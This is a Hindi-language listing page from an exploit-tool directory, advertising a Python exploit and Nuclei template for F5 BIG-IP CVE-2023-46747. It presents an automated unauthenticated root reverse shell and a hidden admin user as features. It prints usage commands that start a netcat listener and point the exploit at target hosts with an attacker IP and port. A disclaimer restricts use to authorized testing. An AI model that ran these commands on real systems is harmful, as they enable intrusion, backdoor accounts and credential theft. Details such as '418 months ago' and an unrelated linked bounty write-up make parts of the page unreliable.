Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit — #F5-BIG-IP-CVE-2023-46747-Exploit – अप्रमाणित RCE Raguraman द्वारा Python exploit और Nuclei टेम्पलेट ✓ स्वचालित TCP रिवर्स शेल (LHOST/LPORT) ✓ प्रभावित BIG-IP 13.x–17.x पर परीक्षण किया गया ⚠️ केवल अधिकृत पेन-टेस्टिंग के लिए | Kitploit
उपकरण/GitHubGitHub/razzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubrazzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit

F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit

#F5-BIG-IP-CVE-2023-46747-Exploit – अप्रमाणित RCE Raguraman द्वारा Python exploit और Nuclei टेम्पलेट ✓ स्वचालित TCP रिवर्स शेल (LHOST/LPORT) ✓ प्रभावित BIG-IP 13.x–17.x पर परीक्षण किया गया ⚠️ केवल अधिकृत पेन-टेस्टिंग के लिए

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
418 महीने पहलेअभी तक समीक्षित नहीं

F5 BIG-IP CVE-2023-46747 – अप्रमाणित RCE + रिवर्स शेल

Python3 और Nuclei संस्करण – रागुरामन द्वारा

गंभीर अप्रमाणित RCE (CVSS 9.8) AJP + HTTP अनुरोध तस्करी के माध्यम से
सभी अनपैच किए गए BIG-IP 13.x → 17.x (नवीनतम 17.1.0.3 सहित) पर काम करता है
पैच: https://my.f5.com/manage/s/article/K000137353 (नवंबर 2023)

वास्तविक दुनिया का शोषण विवरण: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd

विशेषताएँ

  • पूरी तरह से स्वचालित (कोई मैन्युअल चरण नहीं)
  • डोमेन नाम या कच्चे IP के साथ काम करता है
  • एक छिपा हुआ व्यवस्थापक उपयोगकर्ता बनाता है
  • तत्काल TCP रिवर्स शेल (रूट)
  • क्रेडेंशियल्स + टोकन के साथ साफ आउटपुट

फ़ाइलें

  • f5-bigip-cve-2023-46747-revshell.py → स्टैंडअलोन Python3 (अनुशंसित)
  • CVE-2023-46747-revshell.yaml → Nuclei टेम्पलेट (वैकल्पिक)

उपयोग – Python3 (सबसे तेज़ और सबसे विश्वसनीय)

root@kitploit:~
# 1. Start your listener
nc -lvnp 4444

# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50   YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444

# → Instant root shell!

Usage – Nuclei template (alternative) Bash # 1. Edit LHOST and LPORT inside the YAML file

2. Start listener

nc -lvnp 4444

3. Scan

nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com

कानूनी चेतावनी

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है, जैसे:

अनुमोदित पैठ परीक्षण कार्य

लिखित अनुमति के साथ रेड टीम संचालन

नियंत्रित प्रयोगशाला वातावरण में अनुसंधान

इस शोषण का उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। अनधिकृत शोषण अवैध है और इसके परिणामस्वरूप आपराधिक अभियोजन हो सकता है।

इस उपकरण का उपयोग करके, आप लागू कानूनों के अनुपालन की सभी जिम्मेदारी स्वीकार करते हैं। लेखक किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है।

टूल डाउनलोड करें